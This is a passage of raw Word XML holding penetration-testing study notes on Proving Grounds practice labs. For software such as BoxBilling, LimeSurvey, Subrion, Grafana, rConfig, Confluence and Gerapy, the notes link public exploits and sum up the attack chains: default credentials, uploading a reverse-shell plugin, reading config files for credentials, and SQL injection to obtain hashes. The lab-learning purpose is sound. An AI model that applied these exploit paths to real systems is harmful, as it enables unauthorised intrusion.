          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The module was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/linux/http/gravcms_exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BoxBilling CMS (&lt;=4.22.1.5) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1333">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bullybox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. It was (CVE-2022-3552). It needed admin authentication beforehand. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the github exploit they used for RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1334">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/0xk4b1r/CVE-2022-3552</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1335">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">other writeup tried the exploitDB one but it didn't work, so they used the same github one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="726"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LimeSurvey (we had version 5.3.24) was exploited with RCE in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1336">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Marketing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. But, the only thing is that we needed admin access, but it was just admin:password for the creds. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="726"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1337">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Y1LD1R1M-1337/Limesurvey-RCE?tab=readme-ov-file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="726"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have to make an XML file (included in github) and a rev.php and then zip it, and then upload as a plugin. Follow instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="726"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And ALSO, we were supposed to google "LimeSurvey" config file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/application/config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which then had </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/application/config/config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use those creds!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subrion 4.2.1 was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1338">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exfiltrated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. It needed authenticaation (which was just admin:admin) and then once you have authentication you can run the exploit which gives you RCE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1339">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49876</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="968"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grafana was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1340">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Fantastic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. In this writeup, they used two exploits, and got a .db file which they found credentials for. And then they fixed up the exploit to crack the hash and got creds for SSH. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="968"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1341">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a more in-depth tutorial and explains the process more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rconfig 3.9.4 was exploited in Quackerjack. However, the exploits used were not specific to 3.9.4 but rather 3.9 and 3.93. We started with no creds but then found creds using exploit, and then used another authenticated RCE exploit after getting creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1342">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup was the shortest and used this SQL injection exploit for rconfig 3.9 which gave us admin MD5 password hash, and then we used to authenticate, and then we used an RCE exploit to get back shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1343">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup used an unauthenticated RCE exploit which didn't work but did give us the admin MD5 password hash and then used the authenticated RCE exploit to get shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1344">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup was long but goes into more depth </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian confluence 7.13.6 was exploited in the Flu PG Practice using an OGNL injection. It was an unauthenticated RCE!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1345">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup tries a bunch of exploits from github and found one that works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1346">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jbaines-r7/through_the_wire/blob/main/through_the_wire.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1347">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup uses a metasploit module which worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit(multi/http/atlassian_confluence_namespace_ognl_injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A85">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A86">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gerapy 0.9.7 was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1348">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Levram</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A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1349">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50640</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
